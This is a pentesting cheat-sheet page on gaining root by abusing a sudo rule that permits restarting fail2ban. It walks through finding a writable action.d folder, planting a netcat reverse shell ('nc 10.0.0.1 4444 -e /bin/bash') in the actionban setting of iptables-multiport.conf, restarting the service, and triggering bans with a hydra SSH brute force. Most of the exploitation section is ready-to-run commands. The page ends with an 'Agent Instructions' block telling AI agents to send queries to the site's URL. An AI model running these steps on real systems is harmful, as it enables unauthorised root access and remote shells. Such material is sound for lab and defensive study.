# Sudo Fail2ban Privilege Escalation

**Fail2ban** is an intrusion prevention software framework.\
It prevents against brute force attacks.

### [Investigation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation/#investigation) <a href="#investigation" id="investigation"></a>

```sh
sudo -l

(root) NOPASSWD: /etc/init.d/fail2ban restart
Copied!
```

If we can execute **"fail2ban"** as root, we can gain access to privileges by modifying the configuration file.\
We need to check if the config file is writable.

```sh
find /etc -writable -ls 2>/dev/null

4 drwxrwx--- 2 root security  4096 Oct 16 08:57 /etc/fail2ban/action.d
Copied!
```

Look inside of **"/etc/fail2ban/jail.conf"** to know more about how fail2ban is configured.

```sh
less /etc/fail2ban/jail.conf

# ---------------------------------------------

# output

...
# "bantime" is the number of seconds that a host is banned.
bantime  = 10s

# A host is banned if it has generated "maxretry" during the last "findtime"
# seconds.
findtime  = 10s

# "maxretry" is the number of failures before a host get banned.
maxretry = 5
...
Copied!
```

<br>

### [Exploitation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation/#exploitation) <a href="#exploitation" id="exploitation"></a>

#### [1. Modify the Configuration File](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation/#1.-modify-the-configuration-file) <a href="#id-1.-modify-the-configuration-file" id="id-1.-modify-the-configuration-file"></a>

For privilege escalation, we need to update the **"iptables-multiport.conf"**.\
Specifically, insert a payload to one of the following values.

* **actionstart**
* **actionstop**
* **actioncheck**
* **actionban**
* **actionunban**

Here update the value of **actionban** which triggers ban on multiple login attempts.\
Copy **iptables-multiport.conf** to the current user's home directory.

```sh
ls -al /etc/fail2ban/action.d/iptables-multiport.conf
# copy this file into the home directory for editing the content
cp /etc/fail2ban/action.d/iptables-multiport.conf ~
Copied!
```

Now modify the file.

```sh
vim ~/iptables-multiport.conf
Copied!
```

We insert a reverse shell payload into the **actionban**.

```sh
actionban = /usr/bin/nc 10.0.0.1 4444 -e /bin/bash
Copied!
```

Then move back the config file to the original one.

```sh
mv ~/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf
Copied!
```

To apply the new configuration, restart it as root.

```sh
sudo /etc/init.d/fail2ban restart
Copied!
```

#### [2. Trigger the Action](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation/#2.-trigger-the-action) <a href="#id-2.-trigger-the-action" id="id-2.-trigger-the-action"></a>

Start a listener in local machine.

```sh
nc -lvnp 4444
Copied!
```

Try to login with the wrong passwords multiple times until we will get banned.\
So that to, **hydra** is useful.

```sh
hydra -l root -P passwords.txt <target-ip> ssh
Copied!
```

After a short time, you will get a root shell via listener.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://morgan-bin-bash.gitbook.io/linux-privilege-escalation/sudo-fail2ban-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.